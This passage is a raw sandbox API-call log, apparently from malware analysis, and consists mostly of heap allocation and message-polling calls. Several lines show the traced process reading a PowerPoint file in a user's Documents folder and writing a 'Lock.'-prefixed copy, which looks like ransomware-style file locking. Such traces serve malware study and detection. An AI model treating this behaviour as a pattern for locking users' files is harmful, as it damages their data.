hHeap=0x25c0000) returned 1 [0266.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0266.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0266.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0266.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0266.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0266.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0266.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0266.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0266.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0266.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0266.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0266.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0266.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0266.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0266.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0266.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0266.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0266.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0266.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0266.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0266.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0266.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0266.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0266.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0266.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0266.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0266.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0266.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0266.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0266.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0266.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0266.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0266.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0266.479] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0266.479] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.479] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.479] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0266.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0266.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.480] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/ZeVUVJRj4YhmoN71.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zevuvjrj4yhmon71.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0266.481] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0266.481] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0266.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0266.481] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0266.481] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.481] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0266.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0266.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0266.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0266.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0266.481] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.ZeVUVJRj4YhmoN71.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.zevuvjrj4yhmon71.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0266.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0266.482] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0266.482] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.483] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0266.483] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0266.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0266.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0266.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0266.483] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0266.483] ReadFile (in: hFile=0x2c8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0266.487] ReadFile (in: hFile=0x2c8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x74d9, lpOverlapped=0x0) returned 1 [0266.487] ReadFile (in: hFile=0x2c8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0266.489] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0266.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0266.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0266.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x174d9) returned 0x24b7a48 [0266.489] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0266.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0266.490] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0266.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0266.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0266.490] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0266.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0266.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2de8 [0266.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0266.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0266.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0266.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x174d9) returned 0x24b7a48 [0266.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0266.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c48 [0266.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0266.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ba8 [0266.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0266.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0266.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0266.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0266.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0266.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0266.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0266.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0266.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0266.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0266.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0266.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0266.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x174d9) returned 0x34b2250 [0266.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0266.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0266.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0266.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0266.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0266.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0266.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0266.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0266.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0266.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0266.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0266.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0266.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0266.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0266.497] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0266.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0266.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0266.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0266.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0266.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0266.497] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0266.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0266.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0266.498] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0266.498] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0266.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0266.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0266.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0266.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0266.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0266.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0266.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0266.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0266.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0266.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0266.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0266.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.499] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0266.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0266.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.499] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 